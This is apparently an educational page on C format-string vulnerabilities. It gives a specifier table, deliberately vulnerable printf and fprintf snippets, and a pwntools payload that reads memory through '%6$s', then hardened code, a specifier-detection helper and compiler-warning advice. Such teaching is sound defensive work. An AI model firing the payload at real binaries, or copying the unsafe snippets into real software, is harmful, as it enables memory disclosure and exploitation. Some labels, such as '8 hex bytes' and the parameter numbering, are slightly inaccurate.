| Specifier | Meaning |
|---|---|
| `%08x` | 8 hex bytes (zero-padded) |
| `%d` | Signed integer |
| `%u` | Unsigned integer |
| `%s` | String (dereferences the argument as a `char *`) |
| `%p` | Pointer |
| `%n` | Writes the number of bytes output so far into the pointed-to integer |
| `%hn` | Same as `%n` but writes 2 bytes instead of 4 |
| `%<n>$X` | Direct access to the n-th argument. Example: `printf("%3$d", var1, var2, var3)` accesses `var3` |
Examples:

Vulnerable example:

```c
char buffer[30];
gets(buffer);   // Dangerous: takes user input without restrictions.
printf(buffer); // If buffer contains "%x", it reads from the stack.
```
Normal use:

```c
int value = 1205;
printf("%x %x %x", value, value, value); // Outputs: 4b5 4b5 4b5
```
Missing arguments:

```c
printf("%x %x %x", value); // Unexpected output: reads whatever values happen to be on the stack.
```
fprintf vulnerability:

```c
#include <stdio.h>

int main(int argc, char *argv[]) {
    char *user_input;
    user_input = argv[1];
    FILE *output_file = fopen("output.txt", "w");
    fprintf(output_file, user_input); // The user input can include format specifiers!
    fclose(output_file);
    return 0;
}
```
Accessing Pointers

The format `%<n>$x`, where `n` is a number, tells printf to select the n-th argument (taken from the stack). So, to read the 4th argument on the stack with printf, you can do:

```python
from pwn import *

p = process('./bin')

payload = b'%6$s'          # 4th param: the start of our input buffer
payload += b'xxxx'         # 5th param (needed to fill 8 bytes with the initial input)
payload += p32(0x8048000)  # 6th param: the address that %6$s dereferences

p.sendline(payload)
log.info(p.clean())  # b'\x7fELF\x01\x01\x01||||'
```
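The vulnerable snippets above and the `%<n>$x` direct-access trick share a single root cause: untrusted text is used as the format string, so the attacker chooses which stack slots printf reads or writes. The following is an added example, not code from the original page; it shows the hardened counterparts of `printf(buffer)` and `fprintf(output_file, user_input)` (a literal `"%s"` format, or `fputs`, which does no format parsing at all), plus a small detection helper. The function names `render_untrusted`, `write_untrusted` and `looks_like_format_attack` and the sample input are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Hardened counterpart of printf(buffer): untrusted text is always passed as an
 * ARGUMENT to a fixed, literal format string, never as the format itself.
 * Returns what snprintf returns (the length "%s" would produce), so callers can
 * detect truncation. */
int render_untrusted(char *dst, size_t cap, const char *untrusted) {
    return snprintf(dst, cap, "%s", untrusted);
}

/* Hardened counterpart of fprintf(output_file, user_input): fputs performs no
 * format parsing at all. Returns 0 on success, -1 on I/O error. */
int write_untrusted(FILE *f, const char *untrusted) {
    return fputs(untrusted, f) == EOF ? -1 : 0;
}

/* Detection helper (assumed name): returns 1 if the string contains a '%' that
 * would start a conversion (anything except the literal "%%"). Useful for
 * logging or rejecting input to legacy code that cannot be fixed immediately;
 * it is not a substitute for the literal-format fix above. */
int looks_like_format_attack(const char *s) {
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; } /* "%%" is just a percent sign */
        return 1;
    }
    return 0;
}

int main(int argc, char *argv[]) {
    /* Constructed sample input that would read stack slots under printf(input). */
    const char *input = argc > 1 ? argv[1] : "%x%x%x%6$s";
    char line[128];

    if (looks_like_format_attack(input))
        fprintf(stderr, "warning: input contains conversion specifiers\n");

    /* Both calls output the input literally; no stack slots are touched. */
    render_untrusted(line, sizeof line, input);
    printf("%s\n", line);

    FILE *out = fopen("output.txt", "w");
    if (out == NULL) { perror("fopen"); return 1; }
    int rc = write_untrusted(out, input);
    fclose(out);
    return rc == 0 ? 0 : 1;
}
```

Compiling with `-Wformat -Wformat-security` (gcc and clang) flags every call where a non-literal format string is used with no arguments, which catches exactly the `printf(buffer)` and `fprintf(output_file, user_input)` patterns shown above at build time.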